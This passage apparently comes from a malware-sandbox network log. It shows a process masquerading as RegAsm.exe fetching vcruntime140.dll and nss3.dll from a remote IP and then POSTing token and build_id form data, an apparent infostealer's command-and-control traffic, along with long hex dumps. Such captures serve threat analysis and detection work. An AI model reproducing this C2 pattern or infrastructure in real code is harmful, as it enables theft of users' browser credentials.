2024-09-26 22:16:04 UTC	16384	IN	Data Raw: 77 8b 75 20 85 f6 7e 7a 8b 7d 1c 83 c7 08 c7 45 d8 00 00 00 00 c7 45 d4 04 00 00 00 eb 18 0f 1f 84 00 00 00 00 00 8b 47 fc 8b 00 89 45 d8 83 c7 0c 83 c6 ff 74 5a 8b 47 f8 85 c0 74 19 3d 61 01 00 00 74 e2 8b 4f fc eb 15 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 8b 4f fc 8b 11 89 55 d4 ff 37 51 50 ff 75 dc e8 8c 53 00 00 83 c4 10 85 c0 74 bd 89 c3 e9 80 01 00 00 bf 02 00 00 00 e9 83 01 00 00 c7 45 d4 04 00 00 00 c7 45 d8 00 00 00 00 8b 45 10 8b 4d 0c 83 ec 1c 0f 28 05 40 fb 02 10 0f 11 44 24 0c 89 44 24 08 89 4c 24 04 8b 45 08 89 04 24 e8 fe 7c ff ff 83 c4 1c 85 c0 74 0c 89 c3 ff 75 dc e8 7d 5a 00 00 eb 3d 8b 7d 18 8b 5d 14 57 e8 8b 4d 01 00 83 c4 04 89 c6 89 7d ec 8d 45 ec 50 56 57 53 ff 75 08 e8 e8 9a ff ff 83 c4 14 85 c0 74 26 89 c3 ff 75 dc e8 47 5a 00 00 Data Ascii: wu ~z}EEGEtZGt=atOf.OU7QPuStEEEM(@D$D$L$E$\|tu}Z=}]WM}EPVWSut&uGZ
2024-09-26 22:16:04 UTC	16384	IN	Data Raw: 37 ff 75 08 e8 4d 2b 00 00 83 c4 04 85 c0 74 51 8b 48 38 b8 91 00 00 00 85 c9 74 4a 83 39 02 75 45 83 79 04 00 74 3f 8b 55 0c 8b 59 6c 83 c3 08 89 1f 31 c0 85 d2 74 2e b8 50 01 00 00 39 de 72 25 8b 01 89 02 8b 41 70 89 42 04 83 c2 08 ff 71 6c ff 71 64 52 e8 cc 0f 01 00 83 c4 0c 31 c0 eb 05 b8 b3 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 7d 10 a1 14 90 03 10 31 e8 89 45 f0 85 ff 0f 84 2d 01 00 00 8b 5d 0c 8b 33 ff 75 08 e8 b5 2a 00 00 83 c4 04 b9 b3 00 00 00 85 c0 0f 84 12 01 00 00 83 fe 0a 0f 87 f7 00 00 00 b9 78 06 00 00 0f a3 f1 73 12 8d 48 38 eb 1a 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 b9 83 01 00 00 0f a3 f1 73 e4 8d 48 34 8b 09 83 fe 0a 77 2f ba 78 06 00 00 0f a3 f2 73 12 83 c0 38 eb 1a 66 2e 0f 1f 84 00 Data Ascii: 7uM+tQH8tJ9uEyt?UYl1t.P9r%ApBqlqdR1^_[]USWV}1E-]3u*xsH8f.sH4w/xs8f.
2024-09-26 22:16:04 UTC	16384	IN	Data Raw: 40 00 00 5d c3 b8 00 00 08 00 5d c3 cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 ff 75 08 e8 c2 d8 ff ff 83 c4 04 85 c0 0f 84 9c 03 00 00 89 c6 c7 40 24 00 00 00 00 bf 02 00 00 00 83 78 0c 00 0f 88 54 03 00 00 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 8b 46 34 8b 5e 40 8d 4b 01 89 4e 40 50 ff 15 10 7c 03 10 83 c4 04 83 fb 2c 0f 8f 29 03 00 00 6b c3 54 8d 0c 06 83 c1 64 89 4c 06 5c c7 44 06 64 57 43 53 ce c7 44 06 60 04 00 00 00 c7 44 06 58 00 00 00 00 c7 44 06 54 00 00 00 00 0f 57 c0 0f 11 44 06 44 83 7e 0c 00 0f 88 ea 02 00 00 8d 1c 06 83 c3 44 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 69 4b 10 c5 90 c6 6a 8b 86 0c 0f 00 00 83 c0 ff 21 c8 8b 8c 86 10 0f 00 00 89 0b c7 43 04 00 00 00 00 8b 8c 86 10 0f 00 00 85 c9 74 03 89 59 04 89 9c 86 10 0f 00 00 ff 76 34 ff 15 Data Ascii: @]]USWVu@$xTv4{F4^@KN@P\|,)kTdL\DdWCSD`DXDTWDD~Dv4{iKj!CtYv4
2024-09-26 22:16:04 UTC	16384	IN	Data Raw: e4 89 c7 eb 02 31 ff 8b 4d f0 31 e9 e8 15 8c 00 00 89 f8 81 c4 3c 01 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 89 d6 89 cf 8b 5d 08 8b 4b 24 ff 15 00 a0 03 10 ff 75 14 ff 75 10 ff 75 0c 53 ff d1 83 c4 10 85 c0 75 1e 31 c0 39 5e 34 0f 94 c0 89 f9 89 f2 ff 75 14 ff 75 10 ff 75 0c 50 e8 1c 2b 00 00 83 c4 10 5e 5f 5b 5d c3 cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 45 08 8b 0d 14 90 03 10 31 e9 89 4d f0 c7 45 ec 00 00 00 00 85 c0 74 63 8b 75 10 8b 58 34 85 db 74 5d 85 f6 74 5f 8b 4d 0c 8d 45 e8 8d 7d ec 89 f2 50 57 e8 8e 00 00 00 83 c4 08 85 c0 74 60 89 c7 8b 45 ec 89 45 e4 8b 4b 14 ff 15 00 a0 03 10 ff 75 14 56 57 53 8b 5d e4 ff d1 83 c4 10 89 c6 85 db 74 40 57 e8 96 8d 00 00 83 c4 04 ff 75 e8 53 e8 b4 8d 00 00 83 c4 08 eb 29 31 f6 eb 25 Data Ascii: 1M1<^_[]USWV]K$uuuSu19^4uuuP+^_[]USWVE1MEtcuX4t]t_ME}PWt`EEKuVWS]t@WuS)1%

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.5	49747	5.75.211.162	443	528	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:16:04 UTC	201	OUT	GET /vcruntime140.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 22:16:05 UTC	261	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 22:16:05 GMT Content-Type: application/octet-stream Content-Length: 80880 Connection: close Last-Modified: Thursday, 26-Sep-2024 22:16:05 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
2024-09-26 22:16:05 UTC	16123	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL\|0]"
2024-09-26 22:16:05 UTC	16384	IN	Data Raw: 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 03 0f b6 42 03 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 6f 05 00 00 8b 46 04 3b 42 04 74 4f 0f b6 f8 0f b6 42 04 2b f8 75 18 0f b6 7e 05 0f b6 42 05 2b f8 75 0c 0f b6 7e 06 0f b6 42 06 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 07 0f b6 42 07 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 0e 05 00 00 8b 46 08 3b 42 08 74 4f 0f b6 f8 0f b6 42 08 2b f8 75 18 0f b6 7e 09 0f b6 42 09 2b f8 75 0c 0f b6 7e 0a 0f b6 42 0a 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 0b 0f b6 42 0b 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 ad 04 00 00 8b 46 0c Data Ascii: +t3MNB+t3E3oF;BtOB+u~B+u~B+t3MNB+t3E3F;BtOB+u~B+u~B+t3MNB+t3E3F
2024-09-26 22:16:05 UTC	16384	IN	Data Raw: 75 08 8b 45 94 a3 a4 f2 00 10 8d 45 cc 50 e8 39 08 00 00 59 6a 28 8d 4d 80 8b f0 e8 67 f3 ff ff 56 8d 4d f0 51 8b c8 e8 0a f7 ff ff 6a 29 8d 85 70 ff ff ff 50 8d 4d f0 e8 1b f7 ff ff 50 8d 4d f8 e8 78 f7 ff ff 81 7d dc 00 08 00 00 75 1a 8b c3 25 00 07 00 00 3d 00 02 00 00 74 0c 8d 45 98 50 8d 4d f8 e8 55 f7 ff ff a1 98 f2 00 10 c1 e8 13 f7 d0 a8 01 8d 45 cc 50 74 11 e8 92 2e 00 00 59 50 8d 4d f8 e8 34 f7 ff ff eb 0f e8 81 2e 00 00 59 50 8d 4d f8 e8 9f f8 ff ff 8d 45 cc 50 e8 69 23 00 00 59 50 8d 4d f8 e8 10 f7 ff ff a1 98 f2 00 10 c1 e8 08 f7 d0 a8 01 8d 45 cc 50 74 11 e8 30 3e 00 00 59 50 8d 4d f8 e8 ef f6 ff ff eb 0f e8 1f 3e 00 00 59 50 8d 4d f8 e8 5a f8 ff ff 8d 45 cc 50 e8 6a 19 00 00 59 50 8d 4d f8 e8 47 f8 ff ff a1 98 f2 00 10 c1 e8 02 f7 d0 a8 01 Data Ascii: uEEP9Yj(MgVMQj)pPMPMx}u%=tEPMUEPt.YPM4.YPMEPi#YPMEPt0>YPM>YPMZEPjYPMG
2024-09-26 22:16:05 UTC	16384	IN	Data Raw: d0 81 c9 00 08 00 00 83 e2 18 74 1c 83 fa 08 74 0f 83 fa 10 74 15 b8 ff ff 00 00 e9 f7 01 00 00 81 c9 80 00 00 00 eb 03 83 c9 40 83 e0 06 2b c7 0f 84 df 01 00 00 2b c6 74 1e 2b c6 74 0f 2b c6 75 d4 81 c9 00 04 00 00 e9 c8 01 00 00 81 c9 00 01 00 00 e9 bd 01 00 00 81 c9 00 02 00 00 e9 b2 01 00 00 2b c6 75 af 8d 51 01 89 15 90 f2 00 10 8a 02 3c 30 7c 2a 3c 39 7f 26 0f be c0 83 c2 d1 03 c2 a3 90 f2 00 10 e8 8c fe ff ff 0d 00 00 01 00 e9 81 01 00 00 b8 fe ff 00 00 e9 77 01 00 00 b9 ff ff 00 00 e9 dc 00 00 00 83 f8 2f 0f 8e 63 ff ff ff 8b f2 83 f8 35 7e 62 83 f8 41 0f 85 53 ff ff ff 81 c9 00 90 00 00 e9 b8 00 00 00 b9 fe ff 00 00 4a e9 ad 00 00 00 81 c9 00 98 00 00 e9 a2 00 00 00 83 e8 43 0f 84 94 00 00 00 83 e8 01 0f 84 83 00 00 00 83 e8 01 74 76 83 e8 0d 0f Data Ascii: ttt@++t+t+u+uQ<0\|*<9&w/c5~bASJCtv
2024-09-26 22:16:05 UTC	15605	IN	Data Raw: 54 cf 8f f8 b4 e9 00 40 03 d5 1c 16 4c d1 c1 d6 ae e8 7c cd cc c1 be ea d2 ff 35 4e c0 ce b5 7a ad bb a6 bb 2e dc 94 e9 f3 1e 7d e0 ec 28 a3 07 82 66 5a c3 5b 5a cb ec 03 c9 e3 2c 94 15 21 2b a0 f9 d9 9b 4b e7 b6 de eb 20 51 8c 3e fa 2c 23 d5 18 b0 f0 b1 a0 70 6c 7a ef 8b 83 48 a6 3a 02 06 ef a0 8a 2c b7 88 45 30 82 05 ff 30 82 03 e7 a0 03 02 01 02 02 13 33 00 00 01 51 9e 8d 8f 40 71 a3 0e 41 00 00 00 00 01 51 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 30 7e 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 28 30 26 06 03 55 04 03 13 1f 4d 69 63 72 6f Data Ascii: T@L\|5Nz.}(fZ[Z,!+K Q>,#plzH:,E003Q@qAQ0*H0~10UUS10UWashington10URedmond10UMicrosoft Corporation1(0&UMicro

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.5	49748	5.75.211.162	443	528	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:16:06 UTC	193	OUT	GET /nss3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 22:16:06 UTC	263	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 22:16:06 GMT Content-Type: application/octet-stream Content-Length: 2046288 Connection: close Last-Modified: Thursday, 26-Sep-2024 22:16:06 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
2024-09-26 22:16:06 UTC	16121	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@
2024-09-26 22:16:06 UTC	16384	IN	Data Raw: 1f 01 f2 6b d2 64 89 c7 29 d7 c1 fb 15 01 f3 89 c2 69 f3 90 01 00 00 29 f0 83 e2 03 66 85 d2 0f 94 c2 66 85 ff 0f 95 c6 20 d6 66 85 c0 0f 94 c0 08 f0 0f b6 c0 8d 04 40 8b 55 f0 0f be 84 82 20 7c 1a 10 89 41 10 8a 41 1a fe c8 0f b6 c0 ba 06 00 00 00 0f 49 d0 88 51 1a e9 f7 fe ff ff 83 c2 e8 89 51 0c 8b 41 10 89 45 f0 8b 71 14 40 89 41 10 66 ff 41 1c 0f b7 41 18 a8 03 0f 94 c3 69 f8 29 5c 00 00 8d 97 1c 05 00 00 66 c1 ca 02 0f b7 d2 81 fa 8f 02 00 00 0f 93 c2 20 da 81 c7 10 05 00 00 66 c1 cf 04 0f b7 ff 81 ff a3 00 00 00 0f 92 c6 08 d6 0f b6 d6 8d 14 52 0f be 94 96 20 7c 1a 10 39 55 f0 7c 26 89 f7 c7 41 10 01 00 00 00 8d 56 01 89 51 14 83 fe 0b 7c 12 c7 41 14 00 00 00 00 40 66 89 41 18 66 c7 41 1c 00 00 8a 41 1a fe c0 31 d2 3c 07 0f b6 c0 0f 4d c2 88 41 1a Data Ascii: kd)i)ff f@U \|AAIQQAEq@AfAAi)\f fR \|9U\|&AVQ\|A@fAfAA1<MA
2024-09-26 22:16:06 UTC	16384	IN	Data Raw: 52 f4 1b 10 51 e8 3d b8 06 00 83 c4 0c 66 83 7f 06 00 74 69 31 db 8b 44 9f 14 be 48 01 1d 10 85 c0 74 02 8b 30 68 d3 fe 1b 10 56 e8 f7 5b 19 00 83 c4 08 85 c0 b8 79 64 1c 10 0f 45 c6 8b 4f 10 0f b6 0c 19 f6 c1 02 ba 98 dc 1c 10 be 48 01 1d 10 0f 44 d6 f6 c1 01 b9 b1 de 1c 10 0f 44 ce 50 52 51 68 7f a0 1b 10 8d 44 24 60 50 e8 d6 b7 06 00 83 c4 14 43 0f b7 47 06 39 c3 72 99 8b 44 24 60 8d 48 01 3b 4c 24 58 0f 83 b7 03 00 00 89 4c 24 60 8b 4c 24 54 c6 04 01 29 eb 25 8b 44 24 04 8b 4c 24 08 8b 44 81 10 0f be 08 8d 54 24 50 51 ff 70 20 68 2c e2 1c 10 52 e8 89 b7 06 00 83 c4 10 f6 44 24 64 07 0f 85 4b 03 00 00 8b 44 24 54 85 c0 74 21 8b 4c 24 60 c6 04 08 00 83 7c 24 5c 00 74 12 f6 44 24 65 04 75 0b 8d 4c 24 50 e8 d4 68 06 00 eb 04 8b 44 24 54 89 44 24 18 8b 45 Data Ascii: RQ=fti1DHt0hV[ydEOHDDPRQhD$`PCG9rD$`H;L$XL$`L$T)%D$L$DT$PQp h,RD$dKD$Tt!L$`\|$\tD$euL$PhD$TD$E
2024-09-26 22:16:06 UTC	16384	IN	Data Raw: 40 a1 08 11 1e 10 40 a3 08 11 1e 10 3b 05 30 11 1e 10 77 26 8b 35 38 11 1e 10 85 f6 74 15 8b 0d 78 e0 1d 10 81 f9 80 c2 12 10 75 7b 56 ff 15 68 cc 1d 10 89 f8 5e 5f 5b 5d c3 a3 30 11 1e 10 eb d3 a3 0c 11 1e 10 eb b9 89 3d 20 11 1e 10 e9 54 ff ff ff 31 ff eb dc 8b 0d 40 e0 1d 10 ff 15 00 40 1e 10 57 ff d1 83 c4 04 eb ca ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 0b ff ff ff 89 f7 c1 ff 1f 29 f1 19 f8 31 d2 39 0d e4 10 1e 10 19 c2 7d 27 c7 05 50 11 1e 10 00 00 00 00 e9 20 ff ff ff 31 ff e9 6d ff ff ff ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 7b ff ff ff c7 05 50 11 1e 10 01 00 00 00 8b 1d 38 11 1e 10 85 db 74 2e 8b 0d 78 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 8b 1d 38 11 1e 10 85 db 74 12 8b 0d 70 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 a1 4c 11 1e 10 Data Ascii: @@;0w&58txu{Vh^_[]0= T1@@W@V)19}'P 1m@V{P8t.x@S8tp@SL
2024-09-26 22:16:06 UTC	16384	IN	Data Raw: ff 8b 44 24 08 8a 40 12 e9 fc fc ff ff 8b 44 24 08 8b 70 44 8b 06 85 c0 0f 84 81 fd ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 67 fd ff ff 8b 44 24 08 8b 70 40 8b 06 85 c0 74 2d 8b 4c 24 08 80 79 0d 00 75 11 8b 48 20 ff 15 00 40 1e 10 6a 01 56 ff d1 83 c4 08 8b 44 24 08 80 78 12 05 74 08 8b 44 24 08 c6 40 12 01 8b 4c 24 08 8a 41 0c 88 41 13 e9 13 fe ff ff 8b 44 24 08 8b 30 8b 4e 1c 85 c9 0f 84 88 fa ff ff 8b 44 24 08 8b b8 ec 00 00 00 ff 15 00 40 1e 10 6a 00 57 56 ff d1 83 c4 0c 89 44 24 0c e9 72 f6 ff ff 8b 4c 24 08 89 81 a0 00 00 00 e9 f7 f9 ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 26 fa ff ff 31 f6 46 e9 d2 fc ff ff 31 db f6 44 24 1c 01 0f 84 40 fe ff ff 68 40 7e 1c 10 68 83 e4 00 00 68 14 dd Data Ascii: D$@D$pDH@VgD$p@t-L$yuH @jVD$xtD$@L$AAD$0ND$@jWVD$rL$H@V&1F1D$@h@~hh
2024-09-26 22:16:06 UTC	16384	IN	Data Raw: 18 89 d8 25 ff ff ff 7f 89 44 24 1c 85 f6 7e 6f 8b 7d 0c 89 54 24 04 8b 0d 30 e4 1d 10 8b 45 08 8b 40 08 89 04 24 ff 15 00 40 1e 10 8d 44 24 10 50 8d 44 24 10 50 56 57 ff 74 24 10 ff d1 85 c0 0f 84 92 00 00 00 8b 44 24 0c 85 c0 8b 54 24 04 74 42 29 c6 72 3e 01 c2 83 d3 00 89 54 24 18 89 d9 81 e1 ff ff ff 7f 89 4c 24 1c 01 c7 85 f6 7f a2 8b 44 24 24 85 c0 0f 85 92 00 00 00 31 ff 8b 4c 24 28 31 e9 e8 9d 64 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 8b 0d 8c e2 1d 10 ff 15 00 40 1e 10 ff d1 89 c2 8b 45 08 89 50 14 83 fa 70 74 05 83 fa 27 75 3f bf 0d 00 00 00 b9 0d 00 00 00 68 ee b2 00 00 8b 45 08 ff 70 1c 68 65 8a 1c 10 e8 c4 1e 14 00 83 c4 0c eb a7 8d 4c 24 24 8d 54 24 08 e8 12 20 14 00 85 c0 0f 85 2a ff ff ff 8b 54 24 08 eb b1 bf 0a 03 00 00 b9 0a 03 00 00 68 f3 Data Ascii: %D$~o}T$0E@$@D$PD$PVWt$D$T$tB)r>T$L$D$$1L$(1de^_[]@EPpt'u?hEpheL$$T$ *T$h
2024-09-26 22:16:06 UTC	16384	IN	Data Raw: 64 8b 0c 38 e8 8e f3 ff ff 43 83 c7 30 3b 5e 68 7c ec 8b 44 24 0c 89 46 68 83 7c 24 04 01 75 72 8b 56 64 8d 1c 40 c1 e3 04 83 7c 1a 1c 00 74 4b 8b 4e 48 8b 01 85 c0 74 42 3d 58 00 1a 10 75 34 8b 86 a8 00 00 00 8b be ac 00 00 00 83 c0 04 83 d7 00 89 74 24 04 89 d6 8b 54 1a 18 0f af fa f7 e2 01 fa 52 50 51 e8 8c 45 12 00 89 f2 8b 74 24 10 83 c4 0c 8b 44 1a 18 89 46 38 31 ff 8b 4c 24 30 31 e9 e8 9f 24 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 89 74 24 04 8b 86 e8 00 00 00 89 44 24 08 85 c0 0f 84 88 01 00 00 83 7c 24 0c 00 0f 84 ac 00 00 00 8b 44 24 04 8b 70 64 85 f6 0f 84 9d 00 00 00 8b 44 24 0c 48 8d 3c 40 c1 e7 04 8b 44 3e 14 89 44 24 0c b9 00 02 00 00 31 d2 e8 56 3e ff ff 89 44 24 18 85 c0 0f 84 ce 02 00 00 8d 04 3e 89 44 24 14 8d 04 3e 83 c0 14 89 44 24 08 8b Data Ascii: d8C0;^h\|D$Fh\|$urVd@\|tKNHtB=Xu4t$TRPQEt$DF81L$01$e^_[]t$D$\|$D$pdD$H<@D>D$1V>D$>D$>D$
2024-09-26 22:16:06 UTC	16384	IN	Data Raw: e7 00 00 00 8b 99 4c 01 00 00 85 db 0f 85 82 00 00 00 8b 99 48 01 00 00 85 db 75 6b 8b 99 44 01 00 00 85 db 75 7b ff 81 40 01 00 00 8a 5d f3 88 d8 50 e8 d0 ca 11 00 83 c4 04 89 c3 85 c0 0f 84 a7 00 00 00 57 ff 75 e4 53 e8 0f 1c 18 00 83 c4 0c c6 04 3b 00 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c 89 18 0f b6 0b 80 b9 7a f8 19 10 00 78 4a 8b 4d e8 80 b9 d0 00 00 00 02 0f 83 83 00 00 00 83 c4 10 5e 5f 5b 5d c3 8b 03 89 81 48 01 00 00 e9 50 ff ff ff 8b 03 89 81 4c 01 00 00 e9 43 ff ff ff 8b 03 89 81 44 01 00 00 e9 36 ff ff ff ff 81 3c 01 00 00 e9 73 ff ff ff 80 f9 5b 0f b6 c9 ba 5d 00 00 00 0f 45 d1 89 55 ec 31 f6 46 89 df 8a 0c 33 3a 4d ec 74 06 88 0f 46 47 eb f2 8b 4d ec 38 4c 33 01 74 2d c6 07 00 eb 84 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c c7 00 00 00 00 00 e9 6d Data Ascii: LHukDu{@]PWuS;MzxJM^_[]HPLCD6<s[]EU1F3:MtFGM8L3t-Mm
2024-09-26 22:16:06 UTC	16384	IN	Data Raw: 59 18 e8 60 50 fe ff 31 c0 39 46 24 0f 84 b8 f6 ff ff 8b 57 10 85 d2 74 09 8b 4c 24 20 e8 75 c2 ff ff 8b 7c 24 0c c7 47 10 00 00 00 00 e9 98 f6 ff ff 8b 06 89 81 44 01 00 00 e9 e3 f9 ff ff ff 81 3c 01 00 00 e9 80 fc ff ff 8b 44 24 14 80 b8 d0 00 00 00 00 0f 85 f3 fb ff ff 8b 44 24 20 8b 40 10 8b 4c 38 0c 83 79 48 00 0f 85 de fb ff ff ff 34 38 68 b4 e0 1c 10 ff 74 24 1c e8 06 09 00 00 83 c4 0c e9 c5 fb ff ff 8b 4c 24 1c e9 ae fd ff ff 8a 80 08 f7 19 10 3a 83 08 f7 19 10 0f 84 02 fa ff ff e9 c9 f9 ff ff 8b 44 24 20 80 b8 b1 00 00 00 00 0f 84 47 04 00 00 68 48 01 1d 10 ff 74 24 18 e8 5f 2a 01 00 83 c4 08 e9 33 f7 ff ff 8b 44 24 0c 80 48 1e 01 66 83 78 22 00 0f 8e a5 f5 ff ff 31 c9 b8 0e 00 00 00 8b 54 24 0c 8b 52 04 8b 74 02 f6 89 f7 c1 ef 04 83 e7 0f 83 ff Data Ascii: Y`P19F$WtL$ u\|$GD<D$D$ @L8yH48ht$L$:D$ GhHt$_*3D$Hfx"1T$Rt
2024-09-26 22:16:06 UTC	16384	IN	Data Raw: 00 00 85 c0 0f 85 34 f9 ff ff e9 a7 e8 ff ff c7 44 24 24 00 00 00 00 e9 0b f1 ff ff 8b 44 24 0c 8b 40 10 8b 40 1c 8b 4c 24 08 3b 41 3c 0f 84 95 ea ff ff 8b 7c 24 08 ff 37 68 27 f8 1c 10 ff 74 24 0c e8 e0 ea 00 00 83 c4 0c c7 44 24 24 00 00 00 00 e9 a2 f0 ff ff 68 48 e4 1b 10 8b 7c 24 08 57 e8 c1 ea 00 00 83 c4 08 be 0b 00 00 00 68 40 7e 1c 10 68 14 ce 01 00 68 40 bb 1b 10 68 78 fc 1b 10 56 e8 8f 4f 01 00 83 c4 14 89 77 0c c7 44 24 1c 00 00 00 00 e9 83 f8 ff ff 66 ba 1e 00 31 c0 85 c9 0f 85 54 f1 ff ff 31 d2 e9 5b f1 ff ff 31 ff 66 ba 28 00 be ff 0f 00 00 89 cb 31 c0 83 c2 28 89 f9 0f a4 d9 1c c1 e8 04 39 de bb 00 00 00 00 19 fb 89 cb 89 c7 0f 83 f2 f0 ff ff eb df a9 fd ff ff ff 74 65 31 f6 46 b8 ec bb 1b 10 e9 c1 fd ff ff 31 c0 e9 85 f2 ff ff c7 44 24 18 Data Ascii: 4D$$D$@@L$;A<\|$7h't$D$$hH\|$Wh@~hh@hxVOwD$f1T1[1f(1(9te1F1D$

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.5	49749	5.75.211.162	443	528	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:16:09 UTC	278	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----JKEGHDGHCGHDHJKFBFBK User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 1145 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 22:16:09 UTC	1145	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4a 4b 45 47 48 44 47 48 43 47 48 44 48 4a 4b 46 42 46 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 36 61 30 62 39 38 33 36 61 65 35 64 30 61 63 65 32 35 39 65 63 63 39 65 64 66 30 36 32 35 37 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 47 48 44 47 48 43 47 48 44 48 4a 4b 46 42 46 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 39 30 38 34 30 61 38 34 36 64 30 31 37 65 37 62 30 39 35 66 37 35 34 33 63 64 66 32 64 31 35 0d 0a 2d 2d 2d 